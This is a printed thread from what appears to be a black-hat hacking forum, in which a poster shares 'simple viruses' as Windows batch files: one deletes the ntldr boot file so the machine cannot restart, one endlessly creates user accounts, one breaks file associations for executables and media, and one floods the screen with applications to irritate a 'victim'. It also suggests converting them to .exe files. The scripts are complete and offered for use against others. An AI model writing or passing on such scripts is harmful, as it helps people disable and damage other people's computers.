![]() |
Simple Viruses with Notepad - Printable Version +- Best Black Hat Forum (https://bestblackhatforum.eu) +-- Forum: BestBlackHatForum Special VIP Section (https://bestblackhatforum.eu/forumdisplay.php?fid=1) +--- Forum: Vip Hacking Students (https://bestblackhatforum.eu/forumdisplay.php?fid=49) +--- Thread: Simple Viruses with Notepad (/showthread.php?tid=286) |
Simple Viruses with Notepad - TheBoss - 03-28-2014 Hello everyone i joined today and i want to introduce myself. My name is Nick am from Europe somewhere ^^. Am 20 years old and i hope for a great success here on vhf. Ok, lets start first of all this is notepad tricks and tips . I AM NOT RESPONSIBLE OF WHAT HAPPENED TO YOUR COMPUTER 1)Deleting boot files. Goto C drive in Win XP , Tools->Folder Option->View Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply Now Paste The Code in Notepad attrib -S -R -H C:\ntldr del ntldr save it as .bat file Note: After running this batch file , system will not reboot !! 2)User account flooder . @echo off :x net user %random% /add //create user account goto x Save As it as anything.bat Note: This code would start creating windows user accounts whose names could be any random numbers. 3)Extension Changer. @echo off assoc .txt=anything assoc .exe=anything assoc .jpeg=anything assoc .png=anything assoc .mpeg=anything Save As it as anything.bat Note: Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wudn’t open properly. 'To see them, just enter command ‘assoc’ in command prompt.' 4)Application Bomber. :x start winword start mspaint start notepad start write start cmd start explorer start control start calc goto x save it as .bat Note: This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance. 5)More will come in time there is allot i wanna share but we will go slowly everything in time (peace). You can download small program that converts .bat to .exe LINK Spoiler (Click to View) That's it guyz and girls I Know, I Know most of you did know about this but this is for newbies and ofc my introduction ![]() Heave fun ^^ Egypt Okay sorry for last time some of them didn't work now i've tested those and all of them work i will add more in time. Regards, Sonny Setting up Home Server |